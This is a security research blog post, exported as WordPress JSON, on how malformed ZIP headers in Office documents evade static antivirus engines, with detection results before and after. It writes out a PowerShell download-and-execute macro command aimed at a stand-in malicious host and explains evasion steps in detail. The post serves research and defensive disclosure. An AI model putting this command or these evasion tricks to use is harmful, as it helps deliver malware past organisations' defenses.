{"id":280,"date":"2020-12-24T10:28:45","date_gmt":"2020-12-24T10:28:45","guid":{"rendered":"https:\/\/arielkoren.com\/blog\/?p=280"},"modified":"2025-01-03T15:56:33","modified_gmt":"2025-01-03T15:56:33","slug":"forging-malicious-doc","status":"publish","type":"post","link":"https:\/\/arielkoren.com\/blog\/2020\/12\/24\/forging-malicious-doc\/","title":{"rendered":"Forging malicious DOC, undetected by all VirusTotal static engines"},"content":{"rendered":"\n<p>Static engines became a standard in automatic detection for large enterprises thanks to their accurate and quick detection. When looking at detection of email attacks on enterprise organizations, they make 91% of all cyber attack attempts. If an attacker can find a way to infiltrate the organization\u2019s defenses, the organization will become compromised the potential damage can be of millions of dollars.<\/p>\n\n\n\n<!--more-->\n\n\n\n<p>Today, most email file attachments are documents, such as Microsoft Office Word or Excel documents and more (docx, xlsx, xlsm, etc\u2026). Most new Microsoft Office files have a special structure but in reality they are just a ZIP compressed file containing the document media structure and text.<br>Because all of these files are candidates for attack vectors on organizations, detection engines must be able to parse these files correctly to detect exploitation attempts and attacks on enterprises.<\/p>\n\n\n\n<p>In this blog post I will cover ways to exploit security vendors static detection engines, focusing on ZIP file format, the ways it is parsed, how can different parsers fail to detect malicious contents, and the ways attackers can potentially bypass detection engines and infiltrate the organization. Finally, I will provide an in the wild example of attack exploiting such techniques.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Basics<\/h2>\n\n\n\n<p>Before we dive deeply into technical details, let&#8217;s first understand the basics of the ZIP file format. I will not cover all ZIP file structure in the scope of this blog post, the focus would be on files content parsing, and the way it can be exploited. Here is HEX snippet of a simple ZIP file, containing 2 different files, <em>file1<\/em> and <em>file2<\/em>. Each part beginning with PK is a start of a header of a new section. For simplicity and readability reasons, no compression was used in these files (Compression method Store)<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"367\" src=\"https:\/\/lh4.googleusercontent.com\/u1f4wyKJtKMhQpqyrczQKkRgStK7E04HffSMWKyMDDzvSQ1Sxk4nx2kl9sxcRZaalTLVAd75BXjsvZ91k7CTCTcP4Gkto7ATr6EquwI_YRR7HaDELMk6JPRqDNuzDQkalPQq7Iba\"><\/p>\n\n\n\n<p><strong><span class=\"has-inline-color has-vivid-red-color\">RED<\/span><\/strong>: File Header entry of file `<em>file2<\/em>`<br><strong><span style=\"color:#0ca300\" class=\"has-inline-color\">GREEN<\/span><\/strong>: File Header entry of file `<em>file1<\/em>`<br><strong><span class=\"has-inline-color has-vivid-cyan-blue-color\">BLUE<\/span><\/strong>: Central Directory File Header of `<em>file2<\/em>`<br><strong><span style=\"color:#ffa600\" class=\"has-inline-color\">ORANGE<\/span><\/strong>: Central Directory File Header of `<em>file1<\/em>`<br>Rest of the data is closing of PK file format<\/p>\n\n\n\n<p>Each Local File Header contains metadata about the file, such as filename, data length, compression methods and more. After the metadata information, the actual file content can be seen. For example on the first file header entry:<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"109\" src=\"https:\/\/lh3.googleusercontent.com\/jVi9SkGsacE81s50oe8cO8-kg7xax0x178OPjFsPGZwaUSnyhQ6_m6frZT-BXbuAPeQUThEx6gbRHzMmsG2F4fr8gU1PCp326faA8ENrj8SODZhQSo4hbJAX3CKXz4eilO9_rmYS\"><\/p>\n\n\n\n<p><strong><span class=\"has-inline-color has-vivid-cyan-blue-color\">BLUE<\/span><\/strong>: Metadata<br><strong><span class=\"has-inline-color has-vivid-red-color\">RED<\/span><\/strong>: File name<br><strong><span style=\"color:#03a300\" class=\"has-inline-color\">GREEN<\/span><\/strong>: File content<br><em>More information about the file format can be found on <a href=\"https:\/\/en.wikipedia.org\/wiki\/Zip_(file_format)\">wikipedia<\/a>.<\/em><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>File buffers collapsing<\/strong><\/h2>\n\n\n\n<p>Some engines are parsing files using the <em>Central Directory File Header<\/em>, and some are walking on each of the File Headers that are present, one after the other. Calculating the size of each <em>Local File Header<\/em> is simple, in order to do so, add the known header size, to file name length, and content length. This way you can go through all file headers until reaching the <em>Central Directory File Header<\/em>. Another method, is to simply search for the Directory File Header Magic, which is <strong>0x02014B50<\/strong>.<\/p>\n\n\n\n<p>Let&#8217;s examine the <em>Central Directory File Header<\/em> hexdump:<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"144\" src=\"https:\/\/lh4.googleusercontent.com\/0SrlWK5qYH23SnAjZufS-yxA8_hufZAIilB2zeMDEcmIAEzIe9-aoiEFEDJlyKdeYDyaGfsvpxbJ_HoZfpbwefs0hBWjsKHYfbW0yX1nfLHnqnG0uWbzxlIXVWRQz10gnCAQbQoC\"><\/p>\n\n\n\n<p>In red, the offset from the beginning of the file can be seen. Parsing ZIP files content from the <em>Central Directory File Header<\/em> Is also possible, by seeing each file\u2019s offset.<\/p>\n\n\n\n<p>If different engines are parsing the files differently, it is possible to insert hidden files which some parsers will be able to detect, and others will not detect these files.<br><br>Adding a crafted file header inside another file\u2019s content. It is possible to create a file, which some parsers will detect and others won\u2019t. A simple variant of such crafted file hexdump:<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"153\" src=\"https:\/\/lh4.googleusercontent.com\/6z8a-6HXO-GM7ZOQmlqz-hKV3-q-7Gh-Cq_UhXltEr3YK1DSCYQhFDaobGWj4n2wz4tIkPm8uZs-TBFTF3PVokvWDPi2TWwWsQw5v1wgS_RfH-voHCtHl2_O1wlbBcRrpCDtv2xI\"><\/p>\n\n\n\n<p><strong><span class=\"has-inline-color has-vivid-red-color\">RED<\/span><\/strong>: The original file\u2019s length which his original content was the letter \u201cB\u201d 320 (0x140) times.&nbsp;<br><strong><span style=\"color:#00c206\" class=\"has-inline-color\">GREEN<\/span><\/strong>: Inside the original file\u2019s content, a new crafted PK header was created, to include a new file with different content, and a different filename (<em>file9<\/em>). Now when adding the file and creating another <em>Central Directory File Header<\/em> at the end of the ZIP file, to point to the new crafted header as a legitimate file. Some parsers will be able to see the content of <em>file9<\/em>, while others will ignore it, and parse the original file as a whole.<\/p>\n\n\n\n<p>The buffers collapsing attack can get more complicated, where one file can contain several other files. See illustrations as examples:<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"160\" src=\"https:\/\/lh3.googleusercontent.com\/cYaxa-xkvHKAbCY_4SO_1LENzH_P1Jr0kCIjJatvvEC7MpvyKSPluOifVv_NWS8XPq6x0b13Fnv1Vzmehrp98fInhWOPlP-BFPDmxB5QaxT3piYGd2M5AO6r0HeS2fgYkBR_Aeio\"><\/p>\n\n\n\n<p class=\"has-text-align-center\">And the way the Central Directory File Header looks like:<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/B-Gz6wFirEVUBfZKiA_JT7PcSBkfOeaDdYQsFmEhWiaitK6YG3ETkz0XtxS8u8OcGGYzU346m5iO1MK4323Q8L39MbyZd4ImV1wudCLs6mJp2PxFB0ksNdYiaMJCFdzk8MK6_eI7\" width=\"624\" height=\"109\"><\/p>\n\n\n\n<p>Results of extraction of crafter zip file vary between different versions of extractors, thus effectively can bypass different engines, based on how they parse the files.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Ghost File<\/strong><\/h2>\n\n\n\n<p>In the previous method, we added a crafted file between seemingly legitimate files. And by changing the <em>Central Directory File Header<\/em> content, we could point to our crafter buffer and different parsers would extract based on different content.<\/p>\n\n\n\n<p>In this method we will attack ZIP file parsers from a different angle, instead of inserting a crafter file pointer to the <em>Central Directory File Header<\/em>, we simply add a <em>Local File Header Record<\/em> to a new file without adding a pointer to it in the <em>Central Directory File Header<\/em>. Thus some parsers who check files from the <em>Central Directory File Header<\/em>, will not see the existence of the file, while other parsers who enumerate all <em>Local File Header<\/em> will see the file.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Invalid File Header<\/strong><\/h2>\n\n\n\n<p>Some engines will stop their analysis once they reach an unexpected behavior. Other parsing engines like Microsoft Office will try to do best effort to analyze the rest of the file.Adding a simple corrupted header with invalid CRC, file length set to 0xFFFF (Max value), and a short file name, which does not reach the length of 0xFFFF, causes a corrupted file header, and will mess with static engines. This is the simple hexdump Local File Header example:<br><img loading=\"lazy\" decoding=\"async\" width=\"540\" height=\"84\" src=\"https:\/\/lh4.googleusercontent.com\/ndPqu1x5JQJRfWG4Gz18sn_Q3rXk2rxN-O2rOPLZM0V6Yow24fhBhZcTw0SOW9tkuHO66k7-ImIoKF5yuNRNi4dotTsMtCQU3glxn1a-ByVWqPdOdWCyXatY0vrncBOk9zARbTlB\"><\/p>\n\n\n\n<p><strong>Implementation example of Central Directory File Header adjusting attack<\/strong><\/p>\n\n\n\n<p>Creating a simple word with a macro to execute the following command:<\/p>\n\n\n\n<pre class=\"wp-block-verse\"><em>powershell.exe \"\"IEX ((new-object net.webclient).downloadstring('http:\/\/my_malicious.com\/payload.exe '))\"\"<\/em><\/pre>\n\n\n\n<p>Result in virus total:<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/7KfSa4TyYqCBYqJD9_eymU7rLJKJHQs9KLy4UioY050bCQXVTSfl41nvxWq6y3Fd6y6dAObCTKfX1MtDMyYL8zUpsSFeqxjA4gzsXbGzsWxjno6sk1xQm89WxrkSOKH00tDI5unt\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>Only 33\/59 engines detected the file.<br><\/p>\n\n\n\n<p>After simply changing the Central Directory File Header, by removing the vbaProject.bin file, the file containing all macros, the results are astonishing:<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/fzBEVz8QTyWmZ5tHX0KHiMfgmf9lq6rvzP90dTgJC4zzunMU_Y5Ngkn3dmbaOruj0Uls38WA7XGyyy3ZWVLEDUhSJGKgh7axwWCbBS3Z3pg_ENMm7Z7vv7qSjKjhJMnizThmZ5Td\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>17 \/ 59 engines detected the malicious macro, that&#8217;s a 50% drop with a simple change to the document file. While executing in word, the malicious behavior works the same. The only change is when the file is being executed, it asks the user if he wants to recover the file:<br><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"71\" src=\"https:\/\/lh5.googleusercontent.com\/WqGoKnZDMkk_MYzqzPZ54GK8tOItwQqx3e6XZ9mDoK4u6ZUEGitf_zxdoTxdZdqd4WGdpxPrKqGS6IGLC0nY13C3lLqiS80bnwpazfrcQfJOOPnxfgF4FT2y0MvEj6xYkNEwRHTC\"><\/p>\n\n\n\n<p>Clicking Yes, will execute all macros regularly.<\/p>\n\n\n\n<p>To even further change the detection, an invalid header was added to one of the <em>Local File Headers<\/em>, with bad CRC as explained earlier. Adding an invalid header reduced VirusTotal static engines to 1 detection out of 61 engines:<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/T3jQRp6xbLfWYT_g0ZkCMujhZaBTBogXNQypq-NqHlid9LBAq_EtXdvhS2iSWr1vv3eRX3DebvVCJsmkZkaSrkMBHyx7ftSCsdVqPjOJJnvQoSzagqwQ_OGSq9YukvWNwYxbxi9o\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>The file dynamic behavior remained malicious, with a powershell dropped and execute behavior.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Corrupted ZIP File, Exploiting End of Central Directory Record, Real Malware In the wild<\/strong><\/h2>\n\n\n\n<p>Mimecast\u2019s research team found in the wild attacks that changes the PE structure in a way that is causing different parsing engines to fail, while microsoft office succeeds. Regular ZIP file structure is made of several different headers.<br>Starting with <em>Local File Header<\/em> entries, which contain both metadata and files content. Then comes the <em>Central Directory File Header <\/em>entries, which contain the files tree information inside the ZIP file. And finally, the file is enclosed with a <em>End of Central Directory Header<\/em> entry which presents the end of the information in the ZIP file, the very last header of the ZIP file archive and how regular ZIP files end.<\/p>\n\n\n\n<p>However, in the analyzed attack, the attacker altered the <em>Central Directory File Header<\/em> entries, to be contain invalid when parsed, followed by <em>End of Central Directory Header<\/em> entry, which would seem like the end of the ZIP file for some parsers. And following the ending header, a duplicated and corrected <em>Central Directory File Header<\/em> entries are added with a second <em>End of Central Directory Header<\/em> entry. Thus fooling the parsers who dont try to parse the rest of the headers into using the invalid data.<\/p>\n\n\n\n<p>In the illustration below you can view the <em>End of Central Directory header <\/em>which follows by more data, which should not be there regularly. Some parsers dont try to parse and read the rest of the data coming after this header, in contrary to Microsoft Office, where the parser tries to get as much information as possible from the file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/O5brBqZNSAO1mioYq6UWNFTApxsXFGG8t-hNBhGAgH27hp388eLiKCZO581LAq4kBmKsvirqqIOb57BGYBuco8KgSiA9uAY1w3k5wp66fhWQxkk9mPBXn0XPkIf-fM__rxSrLAxF\" alt=\"\"\/><\/figure>\n\n\n\n<p>The <em>End of Central Directory header <\/em>begins with <strong>0x06054B50<\/strong>.&nbsp;<\/p>\n\n\n\n<p>Below you can find an explained illustration of the attack. <em>Local File Headers<\/em> are accurate and contain valid data of the files inside the zip structure, followed by a corrupted and incorrect <em>Central Directory File Headers<\/em>, with a fake ending of <em>End of Central Directory header<\/em> to make parsers end their content evaluation there. Following the <em>End of Central Directory header<\/em>, the correct <em>Central Directory File Headers<\/em> &#8211; which shows the correct content of the files is added.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/dPV-bR9TpI2szo4M2wlOR_37vuKBFfc43ZmRX8Sa3mQdw5sHr7joNDl2Ii5QFbUpiwu7IQkavd88yso45eOQgZKXvOWA6T3gbESlkR9Y6FwIDvpmwtxHW0SZanD1uHTqpE7eAmL3\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>In the wild samples:<\/p>\n\n\n\n<ul class=\"wp-block-list\" id=\"block-20495f09-01e4-47df-9384-ad0e012fa1fd\"><li>97a363e1829277d24dd6d212f486023f1e30d451ca4a2d7fb49de5a52bbed7ed<\/li><li>E707411036cf105d8b634e4f104f6bb1c95be8b4dcf574bdb5b2a265c6818233<\/li><li>ecb9cfea13863f38b404040da47cb85f7b7bb27641783db56e560072c824d14b<\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Static engines became a standard in automatic detection for large enterprises thanks to their accurate and quick detection. When looking at detection of email attacks on enterprise organizations, they make 91% of all cyber attack attempts. If an attacker can find a way to infiltrate the organization\u2019s defenses, the organization will become compromised the potential&#8230; <\/p>\n<div class=\"read-more navbutton\"><a href=\"https:\/\/arielkoren.com\/blog\/2020\/12\/24\/forging-malicious-doc\/\">Read More<i class=\"fa fa-angle-double-right\"><\/i><\/a><\/div>\n","protected":false},"author":2,"featured_media":296,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[37,5],"tags":[36,34,35,38,10,33,42,9,31,43,32],"class_list":["post-280","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bypass","category-malware","tag-bypass","tag-doc","tag-docm","tag-docx","tag-malware","tag-office","tag-office365","tag-reverse-engineering","tag-static-engines","tag-virustotal","tag-zip"],"jetpack_sharing_enabled":true,"jetpack_featured_media_url":"https:\/\/i0.wp.com\/arielkoren.com\/blog\/wp-content\/uploads\/2020\/12\/word.jpg?fit=1200%2C750&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p849zO-4w","_links":{"self":[{"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/posts\/280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/comments?post=280"}],"version-history":[{"count":11,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/posts\/280\/revisions"}],"predecessor-version":[{"id":363,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/posts\/280\/revisions\/363"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/media\/296"}],"wp:attachment":[{"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/media?parent=280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/categories?post=280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/tags?post=280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}